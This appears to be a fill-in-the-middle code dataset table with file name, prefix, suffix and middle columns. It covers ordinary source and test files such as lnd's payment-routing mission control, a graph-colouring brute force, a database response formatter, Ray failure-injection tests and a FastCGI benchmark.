file_name (stringlengths 3–137) | prefix (stringlengths 0–918k) | suffix (stringlengths 0–962k) | middle (stringlengths 0–812k)
---|---|---|---|
missioncontrol.go | package routing
import (
"fmt"
"sync"
"time"
"github.com/btcsuite/btcd/btcec"
"github.com/coreos/bbolt"
"github.com/lightningnetwork/lnd/channeldb"
"github.com/lightningnetwork/lnd/lnwire"
)
const (
// vertexDecay is the decay period of colored vertexes added to
// missionControl. Once vertexDecay passes after an entry has been
// added to the prune view, it is garbage collected. This value is
// larger than edgeDecay as an edge failure typically indicates an
// unbalanced channel, while a vertex failure indicates a node is not
// online and active.
vertexDecay = time.Duration(time.Minute * 5)
// edgeDecay is the decay period of colored edges added to
// missionControl. Once edgeDecay passes after an entry has been added,
// it is garbage collected. This value is smaller than vertexDecay as
// an edge related failure during payment sending typically indicates
// that a channel was unbalanced, a condition which may quickly change.
//
// TODO(roasbeef): instead use random delay on each?
edgeDecay = time.Duration(time.Second * 5)
)
// missionControl contains state which summarizes the past attempts of HTLC
// routing by external callers when sending payments throughout the network.
// missionControl remembers the outcome of these past routing attempts (success
// and failure), and is able to provide hints/guidance to future HTLC routing
// attempts. missionControl maintains a decaying network view of the
// edges/vertexes that should be marked as "pruned" during path finding. This
// graph view acts as a shared memory during HTLC payment routing attempts.
// With each execution, if an error is encountered, based on the type of error
// and the location of the error within the route, an edge or vertex is added
// to the view. Later sending attempts will then query the view for all the
// vertexes/edges that should be ignored. Items in the view decay after a set
// period of time, allowing the view to be dynamic w.r.t network changes.
type missionControl struct {
// failedEdges maps a short channel ID to be pruned, to the time that
// it was added to the prune view. Edges are added to this map if a
// caller reports to missionControl a failure localized to that edge
// when sending a payment.
failedEdges map[uint64]time.Time
// failedVertexes maps a node's public key that should be pruned, to
// the time that it was added to the prune view. Vertexes are added to
// this map if a caller reports to missionControl a failure localized
// to that particular vertex.
failedVertexes map[Vertex]time.Time
graph *channeldb.ChannelGraph
selfNode *channeldb.LightningNode
queryBandwidth func(*channeldb.ChannelEdgeInfo) lnwire.MilliSatoshi
sync.Mutex
// TODO(roasbeef): further counters, if vertex continually unavailable,
// add to another generation
// TODO(roasbeef): also add favorable metrics for nodes
}
// newMissionControl returns a new instance of missionControl.
//
// TODO(roasbeef): persist memory
func newMissionControl(g *channeldb.ChannelGraph, selfNode *channeldb.LightningNode,
qb func(*channeldb.ChannelEdgeInfo) lnwire.MilliSatoshi) *missionControl {
return &missionControl{
failedEdges: make(map[uint64]time.Time),
failedVertexes: make(map[Vertex]time.Time),
selfNode: selfNode,
queryBandwidth: qb,
graph: g,
}
}
// graphPruneView is a filter of sorts that path finding routines should
// consult during the execution. Any edges or vertexes within the view should
// be ignored during path finding. The contents of the view reflect the current
// state of the wider network from the PoV of mission control compiled via HTLC
// routing attempts in the past.
type graphPruneView struct {
edges map[uint64]struct{}
vertexes map[Vertex]struct{}
}
// GraphPruneView returns a new graphPruneView instance which is to be
// consulted during path finding. If a vertex/edge is found within the returned
// prune view, it is to be ignored as a goroutine has had issues routing
// through it successfully. Within this method the main view of the
// missionControl is garbage collected as entries are detected to be "stale".
func (m *missionControl) GraphPruneView() graphPruneView {
// First, we'll grab the current time, this value will be used to
// determine if an entry is stale or not.
now := time.Now()
m.Lock()
// For each of the vertexes that have been added to the prune view, if
// it is now "stale", then we'll ignore it and avoid adding it to the
// view we'll return.
vertexes := make(map[Vertex]struct{})
for vertex, pruneTime := range m.failedVertexes {
if now.Sub(pruneTime) >= vertexDecay {
log.Tracef("Pruning decayed failure report for vertex %v "+
"from Mission Control", vertex)
delete(m.failedVertexes, vertex)
continue
}
vertexes[vertex] = struct{}{}
}
// We'll also do the same for edges, but use the edgeDecay this time
// rather than the decay for vertexes.
edges := make(map[uint64]struct{})
for edge, pruneTime := range m.failedEdges {
if now.Sub(pruneTime) >= edgeDecay {
log.Tracef("Pruning decayed failure report for edge %v "+
"from Mission Control", edge)
delete(m.failedEdges, edge)
continue
}
edges[edge] = struct{}{}
}
m.Unlock()
log.Debugf("Mission Control returning prune view of %v edges, %v "+ | return graphPruneView{
edges: edges,
vertexes: vertexes,
}
}
// paymentSession is used during an HTLC routing session to prune the local
// chain view in response to failures, and also report those failures back to
// missionControl. The snapshot copied for this session will only ever grow,
and will not be pruned after a decay like the main view within mission
// control. We do this as we want to avoid the case where we continually try a
// bad edge or route multiple times in a session. This can lead to an infinite
// loop if payment attempts take long enough. An additional set of edges can
// also be provided to assist in reaching the payment's destination.
type paymentSession struct {
pruneViewSnapshot graphPruneView
additionalEdges map[Vertex][]*channeldb.ChannelEdgePolicy
bandwidthHints map[uint64]lnwire.MilliSatoshi
mc *missionControl
haveRoutes bool
preBuiltRoutes []*Route
}
// NewPaymentSession creates a new payment session backed by the latest prune
// view from Mission Control. An optional set of routing hints can be provided
// in order to populate additional edges to explore when finding a path to the
// payment's destination.
func (m *missionControl) NewPaymentSession(routeHints [][]HopHint,
target *btcec.PublicKey) (*paymentSession, error) {
viewSnapshot := m.GraphPruneView()
edges := make(map[Vertex][]*channeldb.ChannelEdgePolicy)
// Traverse through all of the available hop hints and include them in
// our edges map, indexed by the public key of the channel's starting
// node.
for _, routeHint := range routeHints {
// If multiple hop hints are provided within a single route
// hint, we'll assume they must be chained together and sorted
// in forward order in order to reach the target successfully.
for i, hopHint := range routeHint {
// In order to determine the end node of this hint,
// we'll need to look at the next hint's start node. If
// we've reached the end of the hints list, we can
// assume we've reached the destination.
endNode := &channeldb.LightningNode{}
if i != len(routeHint)-1 {
endNode.AddPubKey(routeHint[i+1].NodeID)
} else {
endNode.AddPubKey(target)
}
// Finally, create the channel edge from the hop hint
// and add it to list of edges corresponding to the node
// at the start of the channel.
edge := &channeldb.ChannelEdgePolicy{
Node: endNode,
ChannelID: hopHint.ChannelID,
FeeBaseMSat: lnwire.MilliSatoshi(
hopHint.FeeBaseMSat,
),
FeeProportionalMillionths: lnwire.MilliSatoshi(
hopHint.FeeProportionalMillionths,
),
TimeLockDelta: hopHint.CLTVExpiryDelta,
}
v := NewVertex(hopHint.NodeID)
edges[v] = append(edges[v], edge)
}
}
// We'll also obtain a set of bandwidthHints from the lower layer for
// each of our outbound channels. This will allow the path finding to
// skip any links that aren't active or just don't have enough
// bandwidth to carry the payment.
sourceNode, err := m.graph.SourceNode()
if err != nil {
return nil, err
}
bandwidthHints, err := generateBandwidthHints(
sourceNode, m.queryBandwidth,
)
if err != nil {
return nil, err
}
return &paymentSession{
pruneViewSnapshot: viewSnapshot,
additionalEdges: edges,
bandwidthHints: bandwidthHints,
mc: m,
}, nil
}
// NewPaymentSessionFromRoutes creates a new paymentSession instance that will
// skip all path finding, and will instead utilize a set of pre-built routes.
// This constructor allows callers to specify their own routes which can be
// used for things like channel rebalancing, and swaps.
func (m *missionControl) NewPaymentSessionFromRoutes(routes []*Route) *paymentSession {
return &paymentSession{
pruneViewSnapshot: m.GraphPruneView(),
haveRoutes: true,
preBuiltRoutes: routes,
mc: m,
}
}
// generateBandwidthHints is a helper function that's utilized by the main
// findPath function in order to obtain hints from the lower layer w.r.t. the
// available bandwidth of edges on the network. Currently, we'll only obtain
// bandwidth hints for the edges we directly have open ourselves. Obtaining
// these hints allows us to reduce the number of extraneous attempts as we can
// skip channels that are inactive, or just don't have enough bandwidth to
// carry the payment.
func generateBandwidthHints(sourceNode *channeldb.LightningNode,
queryBandwidth func(*channeldb.ChannelEdgeInfo) lnwire.MilliSatoshi) (map[uint64]lnwire.MilliSatoshi, error) {
// First, we'll collect the set of outbound edges from the target
// source node.
var localChans []*channeldb.ChannelEdgeInfo
err := sourceNode.ForEachChannel(nil, func(tx *bbolt.Tx,
edgeInfo *channeldb.ChannelEdgeInfo,
_, _ *channeldb.ChannelEdgePolicy) error {
localChans = append(localChans, edgeInfo)
return nil
})
if err != nil {
return nil, err
}
// Now that we have all of our outbound edges, we'll populate the set
// of bandwidth hints, querying the lower switch layer for the most up
// to date values.
bandwidthHints := make(map[uint64]lnwire.MilliSatoshi)
for _, localChan := range localChans {
bandwidthHints[localChan.ChannelID] = queryBandwidth(localChan)
}
return bandwidthHints, nil
}
// ReportVertexFailure adds a vertex to the graph prune view after a client
// reports a routing failure localized to the vertex. The time the vertex was
// added is noted, as it'll be pruned from the shared view after a period of
// vertexDecay. However, the vertex will remain pruned for the *local* session.
// This ensures we don't retry this vertex during the payment attempt.
func (p *paymentSession) ReportVertexFailure(v Vertex) {
log.Debugf("Reporting vertex %v failure to Mission Control", v)
// First, we'll add the failed vertex to our local prune view snapshot.
p.pruneViewSnapshot.vertexes[v] = struct{}{}
// With the vertex added, we'll now report back to the global prune
// view, with this new piece of information so it can be utilized for
// new payment sessions.
p.mc.Lock()
p.mc.failedVertexes[v] = time.Now()
p.mc.Unlock()
}
// ReportChannelFailure adds a channel to the graph prune view. The time the
// channel was added is noted, as it'll be pruned from the global view after a
// period of edgeDecay. However, the edge will remain pruned for the duration
// of the *local* session. This ensures that we don't flap by continually
// retrying an edge after its pruning has expired.
//
// TODO(roasbeef): also add value attempted to send and capacity of channel
func (p *paymentSession) ReportChannelFailure(e uint64) {
log.Debugf("Reporting edge %v failure to Mission Control", e)
// First, we'll add the failed edge to our local prune view snapshot.
p.pruneViewSnapshot.edges[e] = struct{}{}
// With the edge added, we'll now report back to the global prune view,
// with this new piece of information so it can be utilized for new
// payment sessions.
p.mc.Lock()
p.mc.failedEdges[e] = time.Now()
p.mc.Unlock()
}
// RequestRoute returns a route which is likely to be capable of successfully
// routing the specified HTLC payment to the target node. Initially the first
// set of paths returned from this method may encounter routing failure along
// the way, however as more payments are sent, mission control will start to
// build an up to date view of the network itself. With each payment a new area
// will be explored, which feeds into the recommendations made for routing.
//
// NOTE: This function is safe for concurrent access.
func (p *paymentSession) RequestRoute(payment *LightningPayment,
height uint32, finalCltvDelta uint16) (*Route, error) {
switch {
// If we have a set of pre-built routes, then we'll just pop off the
// next route from the queue, and use it directly.
case p.haveRoutes && len(p.preBuiltRoutes) > 0:
nextRoute := p.preBuiltRoutes[0]
p.preBuiltRoutes[0] = nil // Set to nil to avoid GC leak.
p.preBuiltRoutes = p.preBuiltRoutes[1:]
return nextRoute, nil
// If we were instantiated with a set of pre-built routes, and we've
// run out, then we'll return a terminal error.
case p.haveRoutes && len(p.preBuiltRoutes) == 0:
return nil, fmt.Errorf("pre-built routes exhausted")
}
// Otherwise we actually need to perform path finding, so we'll obtain
// our current prune view snapshot. This view will only ever grow
// during the duration of this payment session, never shrinking.
pruneView := p.pruneViewSnapshot
log.Debugf("Mission Control session using prune view of %v "+
"edges, %v vertexes", len(pruneView.edges),
len(pruneView.vertexes))
// TODO(roasbeef): sync logic amongst dist sys
// Taking into account this prune view, we'll attempt to locate a path
// to our destination, respecting the recommendations from
// missionControl.
path, err := findPath(
nil, p.mc.graph, p.additionalEdges, p.mc.selfNode,
payment.Target, pruneView.vertexes, pruneView.edges,
payment.Amount, payment.FeeLimit, p.bandwidthHints,
)
if err != nil {
return nil, err
}
// With the next candidate path found, we'll attempt to turn this into
// a route by applying the time-lock and fee requirements.
sourceVertex := Vertex(p.mc.selfNode.PubKeyBytes)
route, err := newRoute(
payment.Amount, payment.FeeLimit, sourceVertex, path, height,
finalCltvDelta,
)
if err != nil {
// TODO(roasbeef): return which edge/vertex didn't work
// out
return nil, err
}
return route, err
}
// ResetHistory resets the history of missionControl returning it to a state as
// if no payment attempts have been made.
func (m *missionControl) ResetHistory() {
m.Lock()
m.failedEdges = make(map[uint64]time.Time)
m.failedVertexes = make(map[Vertex]time.Time)
m.Unlock()
} | "vertexes", len(edges), len(vertexes))
|
brute_force.py | #!/usr/bin/env python
from testcases import gen_random, gen_fake_random
from time import time
begin = time()
RANDOM = True
conf_cnt = 7
if RANDOM:
test_cases = gen_random(10, conf_cnt)
else:
test_cases = gen_fake_random()
def check_valid(colors: list) -> bool:
# check if it's a valid palette
for conflicts in test_cases:
results = [colors[i] for i in conflicts]
if len(set(results)) != len(conflicts):
# conflict exists!
return False
return True
def get_color_count(colors: list) -> int:
# get different color counts in a palette
return len(set(colors))
palettes = [[0]]
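# Brute force: vertex 0 is fixed to color 0 (color labels are interchangeable),
# then every partial palette is extended with each possible color for the
# remaining vertices, giving conf_cnt ** (conf_cnt - 1) candidate palettes.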
for _ in range(1, conf_cnt):
new_palettes = []
for palette in palettes:
for i in range(conf_cnt):
new_palettes.append(palette + [i])
palettes = new_palettes
min_color = conf_cnt
min_palette = []
for palette in palettes:
if not check_valid(palette):
continue
color_count = get_color_count(palette)
if color_count < min_color:
min_color = color_count
min_palette = [palette]
elif color_count == min_color:
min_palette.append(palette)
end = time()
print("Min color count: %d" % min_color)
print("Possible coloring palettes: \n%s" %
('\n'.join([str(p) for p in min_palette])))
print("Min color count: %d" % min_color)
print("\nTime elapsed: %.6fs" % (end - begin)) | return len(set(colors))
palettes = [[0]] |
response_writer.go | package server
import (
"encoding/csv"
"encoding/json"
"io"
"net/http"
"strconv"
"time"
"github.com/cnosdb/cnosdb/vend/db/models"
"github.com/tinylib/msgp/msgp"
)
// ResponseWriter is an interface for writing a response.
type ResponseWriter interface {
// WriteResponse writes a response.
WriteResponse(resp Response) (int, error)
http.ResponseWriter
}
// NewResponseWriter creates a new ResponseWriter based on the Accept header
// in the request that wraps the ResponseWriter.
func NewResponseWriter(w http.ResponseWriter, r *http.Request) ResponseWriter {
pretty := r.URL.Query().Get("pretty") == "true"
rw := &responseWriter{ResponseWriter: w}
switch r.Header.Get("Accept") {
case "application/csv", "text/csv":
w.Header().Add("Content-Type", "text/csv")
rw.formatter = &csvFormatter{statementID: -1}
case "application/x-msgpack":
w.Header().Add("Content-Type", "application/x-msgpack")
rw.formatter = &msgpackFormatter{}
case "application/json":
fallthrough
default:
w.Header().Add("Content-Type", "application/json")
rw.formatter = &jsonFormatter{Pretty: pretty}
}
return rw
}
type bytesCountWriter struct {
w io.Writer
n int
}
func (w *bytesCountWriter) Write(data []byte) (int, error) {
n, err := w.w.Write(data)
w.n += n
return n, err
}
// responseWriter is an implementation of ResponseWriter.
type responseWriter struct {
formatter interface {
WriteResponse(w io.Writer, resp Response) error
}
http.ResponseWriter
}
// WriteResponse writes the response using the formatter.
func (w *responseWriter) WriteResponse(resp Response) (int, error) {
writer := bytesCountWriter{w: w.ResponseWriter}
err := w.formatter.WriteResponse(&writer, resp)
return writer.n, err
}
// Flush flushes the ResponseWriter if it has a Flush() method.
func (w *responseWriter) Flush() {
if w, ok := w.ResponseWriter.(http.Flusher); ok {
w.Flush()
}
}
// CloseNotify calls CloseNotify on the underlying http.ResponseWriter if it
// exists. Otherwise, it returns a nil channel that will never notify.
func (w *responseWriter) CloseNotify() <-chan bool {
if notifier, ok := w.ResponseWriter.(http.CloseNotifier); ok {
return notifier.CloseNotify()
}
return nil
}
type jsonFormatter struct {
Pretty bool
}
func (f *jsonFormatter) WriteResponse(w io.Writer, resp Response) (err error) {
var b []byte
if f.Pretty {
b, err = json.MarshalIndent(resp, "", " ")
} else {
b, err = json.Marshal(resp)
}
if err != nil {
_, err = io.WriteString(w, err.Error())
} else {
_, err = w.Write(b)
}
_, _ = w.Write([]byte("\n"))
return err
}
type csvFormatter struct {
statementID int
columns []string
}
func (f *csvFormatter) WriteResponse(w io.Writer, resp Response) (err error) {
cw := csv.NewWriter(w)
if resp.Err != nil {
_ = cw.Write([]string{"error"})
_ = cw.Write([]string{resp.Err.Error()})
cw.Flush()
return cw.Error()
}
for _, result := range resp.Results {
if result.StatementID != f.statementID {
// If there are no series in the result, skip past this result.
if len(result.Series) == 0 {
continue
}
// Set the statement id and print out a newline if this is not the first statement.
if f.statementID >= 0 {
// Flush the csv writer and write a newline.
cw.Flush()
if err := cw.Error(); err != nil {
return err
}
if _, err := io.WriteString(w, "\n"); err != nil {
return err
}
}
f.statementID = result.StatementID
// Print out the column headers from the first series.
f.columns = make([]string, 2+len(result.Series[0].Columns))
f.columns[0] = "name"
f.columns[1] = "tags"
copy(f.columns[2:], result.Series[0].Columns)
if err := cw.Write(f.columns); err != nil {
return err
}
}
for i, row := range result.Series {
if i > 0 && !stringsEqual(result.Series[i-1].Columns, row.Columns) {
// The columns have changed. Print a newline and reprint the header.
cw.Flush()
if err := cw.Error(); err != nil {
return err
}
if _, err := io.WriteString(w, "\n"); err != nil {
return err
}
f.columns = make([]string, 2+len(row.Columns))
f.columns[0] = "name"
f.columns[1] = "tags"
copy(f.columns[2:], row.Columns)
if err := cw.Write(f.columns); err != nil {
return err
}
}
f.columns[0] = row.Name
if len(row.Tags) > 0 {
f.columns[1] = string(models.NewTags(row.Tags).HashKey()[1:])
} else {
f.columns[1] = ""
}
for _, values := range row.Values {
for i, value := range values {
if value == nil {
f.columns[i+2] = ""
continue
}
switch v := value.(type) {
case float64:
f.columns[i+2] = strconv.FormatFloat(v, 'f', -1, 64)
case int64:
f.columns[i+2] = strconv.FormatInt(v, 10)
case uint64:
f.columns[i+2] = strconv.FormatUint(v, 10)
case string:
f.columns[i+2] = v
case bool:
if v {
f.columns[i+2] = "true"
} else {
f.columns[i+2] = "false"
}
case time.Time:
f.columns[i+2] = strconv.FormatInt(v.UnixNano(), 10)
case *float64, *int64, *string, *bool:
f.columns[i+2] = ""
}
}
_ = cw.Write(f.columns)
}
}
}
cw.Flush()
return cw.Error()
}
type msgpackFormatter struct{}
func (f *msgpackFormatter) ContentType() string {
return "application/x-msgpack"
}
func (f *msgpackFormatter) WriteResponse(w io.Writer, resp Response) (err error) {
enc := msgp.NewWriter(w)
defer enc.Flush()
_ = enc.WriteMapHeader(1)
if resp.Err != nil {
_ = enc.WriteString("error")
_ = enc.WriteString(resp.Err.Error())
return nil
} else {
_ = enc.WriteString("results")
_ = enc.WriteArrayHeader(uint32(len(resp.Results)))
for _, result := range resp.Results {
if result.Err != nil {
_ = enc.WriteMapHeader(1)
_ = enc.WriteString("error")
_ = enc.WriteString(result.Err.Error())
continue
}
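// Each result map always contains "statement_id" and "series";
// "messages" and "partial" are added to the map header count only when set.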
sz := 2
if len(result.Messages) > 0 {
sz++
}
if result.Partial {
sz++
}
_ = enc.WriteMapHeader(uint32(sz))
_ = enc.WriteString("statement_id")
_ = enc.WriteInt(result.StatementID)
if len(result.Messages) > 0 {
_ = enc.WriteString("messages")
_ = enc.WriteArrayHeader(uint32(len(result.Messages)))
for _, msg := range result.Messages {
_ = enc.WriteMapHeader(2)
_ = enc.WriteString("level")
_ = enc.WriteString(msg.Level)
_ = enc.WriteString("text")
_ = enc.WriteString(msg.Text)
}
}
_ = enc.WriteString("series")
_ = enc.WriteArrayHeader(uint32(len(result.Series)))
for _, series := range result.Series {
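// A series map always contains "columns" and "values"; "name",
// "tags" and "partial" are optional.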
sz := 2
if series.Name != "" {
sz++
}
if len(series.Tags) > 0 {
sz++
}
if series.Partial {
sz++
}
_ = enc.WriteMapHeader(uint32(sz))
if series.Name != "" {
_ = enc.WriteString("name")
_ = enc.WriteString(series.Name)
}
if len(series.Tags) > 0 {
_ = enc.WriteString("tags")
_ = enc.WriteMapHeader(uint32(len(series.Tags)))
for k, v := range series.Tags {
_ = enc.WriteString(k)
_ = enc.WriteString(v)
}
}
_ = enc.WriteString("columns")
_ = enc.WriteArrayHeader(uint32(len(series.Columns)))
for _, col := range series.Columns {
_ = enc.WriteString(col)
}
_ = enc.WriteString("values")
_ = enc.WriteArrayHeader(uint32(len(series.Values)))
for _, values := range series.Values {
_ = enc.WriteArrayHeader(uint32(len(values)))
for _, v := range values {
_ = enc.WriteIntf(v)
}
}
if series.Partial {
_ = enc.WriteString("partial")
_ = enc.WriteBool(series.Partial)
}
}
if result.Partial {
_ = enc.WriteString("partial")
_ = enc.WriteBool(true)
}
}
}
return nil
}
func stringsEqual(a, b []string) bool {
if len(a) != len(b) {
return false
}
for i := range a {
if a[i] != b[i] {
return false
}
}
return true
}
functions.rs | use std::cmp;
static HAS_WHITE_BIT : u8 = 128;
static HAS_BLACK_BIT : u8 = 64;
pub fn optimistic_min <T: PartialOrd> (v1:T, v2:T) -> T {
let cmpres = v1.partial_cmp(&v2).expect("Could not calculate minimum for some special values. This should not happen.");
match cmpres {
cmp::Ordering::Less => v1,
_ => v2
}
}
pub fn clamp <T> (v:T, smallest:T, biggest:T) -> T
where T: Ord {
cmp::max(cmp::min(v,biggest),smallest)
}
pub fn bw_to_bits (v:u8) -> u8 {
if v >= 128 {
HAS_WHITE_BIT
} else {
HAS_BLACK_BIT
}
}
pub fn bit_compressor (a:u8, b:u8, c:u8, d:u8) -> u8 {
a|b|c|d
}
pub fn has_black_and_white (v:u8) -> bool {
v & (HAS_WHITE_BIT | HAS_BLACK_BIT) == (HAS_WHITE_BIT | HAS_BLACK_BIT)
}
pub fn has_white (v:u8) -> bool {
v & HAS_WHITE_BIT != 0
}
pub fn has_black (v:u8) -> bool {
v & HAS_BLACK_BIT != 0
}
pub fn get_needed (v:u8) -> u8 {
debug_assert!(is_white(v) || is_black(v));
if v & HAS_WHITE_BIT != 0 {
HAS_BLACK_BIT
} else {
HAS_WHITE_BIT
}
}
pub fn is_white (v:u8) -> bool {
debug_assert!(!has_black_and_white(v));
v & HAS_WHITE_BIT != 0
}
pub fn is_black (v:u8) -> bool {
debug_assert!(!has_black_and_white(v));
v & HAS_BLACK_BIT != 0
}
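/// Returns Some(i) when x has exactly one set bit (x == 2^i), else None.
/// Note: x == 0 also satisfies `x & (1 << 0) == x`, so log2(0) returns
/// Some(0) rather than None.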
pub fn log2(x: u64) -> Option<u8> {
for i in 0..64 {
let shiftedi : u64 = 1<<i as u64;
let andedx : u64 = x & shiftedi;
if andedx == x {
return Some(i);
}
}
None
}
time_limit_wrappers_test.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Unit tests for //compiler_gym/wrappers."""
from compiler_gym.envs.llvm import LlvmEnv
from compiler_gym.wrappers import TimeLimit
from tests.test_main import main
pytest_plugins = ["tests.pytest_plugins.llvm"]
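# The `env: LlvmEnv` fixture consumed by the tests below is provided by
# the pytest plugin registered above.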
def test_wrapped_close(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
env.close()
assert env.service is None
def test_wrapped_fork_type(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
fkd = env.fork()
try:
assert isinstance(fkd, TimeLimit)
finally:
fkd.close()
def test_wrapped_step_multi_step(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
env.reset(benchmark="benchmark://cbench-v1/dijkstra")
env.step([0, 0, 0])
assert env.benchmark == "benchmark://cbench-v1/dijkstra"
assert env.actions == [0, 0, 0]
def test_wrapped_custom_step_args(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
env.reset(benchmark="benchmark://cbench-v1/dijkstra")
(ic,), _, _, _ = env.step(0, observations=["IrInstructionCount"])
assert isinstance(ic, int)
def test_time_limit_reached(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=3)
env.reset()
_, _, done, info = env.step(0)
assert not done, info
_, _, done, info = env.step(0)
assert not done, info
_, _, done, info = env.step(0)
assert done, info
assert info["TimeLimit.truncated"], info
_, _, done, info = env.step(0)
assert done, info
assert info["TimeLimit.truncated"], info
def test_time_limit_fork(env: LlvmEnv):
"""Check that the time limit state is copied on fork()."""
env = TimeLimit(env, max_episode_steps=3)
env.reset()
_, _, done, info = env.step(0) # 1st step
assert not done, info
fkd = env.fork()
try:
_, _, done, info = env.step(0) # 2nd step
assert not done, info
_, _, done, info = fkd.step(0) # 2nd step
assert not done, info
_, _, done, info = env.step(0) # 3rd step
assert done, info
_, _, done, info = fkd.step(0) # 3rd step
assert done, info
finally:
fkd.close()
if __name__ == "__main__":
main()
test_multinode_failures.py | import os
import signal
import sys
import time
import pytest
import ray
import ray.ray_constants as ray_constants
from ray._private.cluster_utils import Cluster
from ray.test_utils import RayTestTimeoutException, get_other_nodes
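# Windows has no SIGKILL, so fall back to SIGTERM there.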
SIGKILL = signal.SIGKILL if sys.platform != "win32" else signal.SIGTERM
@pytest.fixture(params=[(1, 4), (4, 4)])
def ray_start_workers_separate_multinode(request):
num_nodes = request.param[0]
num_initial_workers = request.param[1]
# Start the Ray processes.
cluster = Cluster()
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_initial_workers)
ray.init(address=cluster.address)
yield num_nodes, num_initial_workers
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_worker_failed(ray_start_workers_separate_multinode):
num_nodes, num_initial_workers = ray_start_workers_separate_multinode
@ray.remote
def get_pids():
time.sleep(0.25)
return os.getpid()
start_time = time.time()
pids = set()
while len(pids) < num_nodes * num_initial_workers:
new_pids = ray.get([
get_pids.remote()
for _ in range(2 * num_nodes * num_initial_workers)
])
for pid in new_pids:
pids.add(pid)
if time.time() - start_time > 60:
raise RayTestTimeoutException(
"Timed out while waiting to get worker PIDs.")
@ray.remote
def f(x):
time.sleep(0.5)
return x
# Submit more tasks than there are workers so that all workers and
# cores are utilized.
object_refs = [f.remote(i) for i in range(num_initial_workers * num_nodes)]
object_refs += [f.remote(object_ref) for object_ref in object_refs]
# Allow the tasks some time to begin executing.
time.sleep(0.1)
# Kill the workers as the tasks execute.
for pid in pids:
try:
os.kill(pid, SIGKILL)
except OSError:
# The process may have already exited due to worker capping.
pass
time.sleep(0.1)
# Make sure that we either get the object or we get an appropriate
# exception.
for object_ref in object_refs:
try:
ray.get(object_ref)
except (ray.exceptions.RayTaskError,
ray.exceptions.WorkerCrashedError):
pass
def _test_component_failed(cluster, component_type):
"""Kill a component on all worker nodes and check workload succeeds."""
# Submit many tasks with many dependencies.
@ray.remote
def f(x):
# Sleep to make sure that tasks actually fail mid-execution.
time.sleep(0.01)
return x
@ray.remote
def g(*xs):
# Sleep to make sure that tasks actually fail mid-execution. We
# only use it for direct calls because the test already takes a
# long time to run with the raylet codepath.
time.sleep(0.01)
return 1
# Kill the component on all nodes except the head node as the tasks
# execute. Do this in a loop while submitting tasks between each
# component failure.
time.sleep(0.1)
worker_nodes = get_other_nodes(cluster)
assert len(worker_nodes) > 0
for node in worker_nodes:
process = node.all_processes[component_type][0].process
# Submit a round of tasks with many dependencies.
x = 1
for _ in range(1000):
x = f.remote(x)
xs = [g.remote(1)]
for _ in range(100):
xs.append(g.remote(*xs))
xs.append(g.remote(1))
# Kill a component on one of the nodes.
process.terminate()
time.sleep(1)
process.kill()
process.wait()
assert process.poll() is not None
# Make sure that we can still get the objects after the
# executing tasks died.
ray.get(x)
ray.get(xs)
def check_components_alive(cluster, component_type, check_component_alive):
"""Check that a given component type is alive on all worker nodes."""
worker_nodes = get_other_nodes(cluster)
assert len(worker_nodes) > 0
for node in worker_nodes:
process = node.all_processes[component_type][0].process
if check_component_alive:
assert process.poll() is None
else:
print("waiting for " + component_type + " with PID " +
str(process.pid) + "to terminate")
process.wait()
print("done waiting for " + component_type + " with PID " +
str(process.pid) + "to terminate")
assert process.poll() is not None
@pytest.mark.parametrize(
"ray_start_cluster",
[{
"num_cpus": 8,
"num_nodes": 4,
"_system_config": {
# Raylet codepath is not stable with a shorter timeout.
"num_heartbeats_timeout": 10
},
}],
indirect=True)
def test_raylet_failed(ray_start_cluster):
cluster = ray_start_cluster
# Kill all raylets on worker nodes.
_test_component_failed(cluster, ray_constants.PROCESS_TYPE_RAYLET)
# The plasma stores should still be alive on the worker nodes.
check_components_alive(cluster, ray_constants.PROCESS_TYPE_PLASMA_STORE,
True)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
soln.py | import heapq
import random
def merge(lists):
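# Python lists compare lexicographically, so the heap always surfaces the
# list whose current head element is smallest; a list that has been emptied
# is discarded the next time it is popped.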
heapq.heapify(lists)
m = []
while len(lists) > 0:
l = heapq.heappop(lists)
if len(l) == 0:
continue
m.append(l.pop(0))
heapq.heappush(lists, l)
return m
def test(n, k):
lists = [[] for _ in xrange(k)]
for i in xrange(n):
lists[random.randrange(k)].append(i)
m = merge(lists)
assert m == range(n)
print 'pass'
def main():
test(100000, 50)
if __name__ == '__main__':
main()
async_client_bench.rs | #![feature(test)]
extern crate test;
use fastcgi_client::{request::Request, Client, Params};
use std::env::current_dir;
use test::Bencher;
use tokio::{
io::{self, AsyncRead, AsyncWrite},
net::TcpStream,
};
mod common;
async fn test_client<S: AsyncRead + AsyncWrite + Unpin>(client: &mut Client<S>) {
let document_root = current_dir().unwrap().join("tests").join("php");
let document_root = document_root.to_str().unwrap();
let script_name = current_dir()
.unwrap()
.join("tests")
.join("php")
.join("index.php");
let script_name = script_name.to_str().unwrap();
let params = Params::default()
.set_request_method("GET")
.set_document_root(document_root)
.set_script_name("/index.php")
.set_script_filename(script_name)
.set_request_uri("/index.php")
.set_document_uri("/index.php")
.set_remote_addr("127.0.0.1")
.set_remote_port("12345")
.set_server_addr("127.0.0.1")
.set_server_port("80")
.set_server_name("jmjoy-pc")
.set_content_type("")
.set_content_length("0");
let output = client
.execute(Request::new(params, &mut io::empty()))
.await
.unwrap();
let stdout = String::from_utf8(output.get_stdout().unwrap_or(Default::default())).unwrap();
assert!(stdout.contains("Content-type: text/html; charset=UTF-8"));
assert!(stdout.contains("\r\n\r\n"));
assert!(stdout.contains("hello"));
assert_eq!(output.get_stderr(), None);
}
#[bench]
fn | (b: &mut Bencher) {
common::setup();
let rt = tokio::runtime::Builder::new_multi_thread()
.worker_threads(6)
.enable_all()
.build()
.unwrap();
let mut client = rt.block_on(async {
let stream = TcpStream::connect(("127.0.0.1", 9000)).await.unwrap();
Client::new(stream, true)
});
b.iter(|| {
rt.block_on(async {
test_client(&mut client).await;
});
});
}
lines.go | package hud
import (
"github.com/faiface/glhf"
"github.com/go-gl/gl/v3.3-core/gl"
"github.com/go-gl/mathgl/mgl32"
)
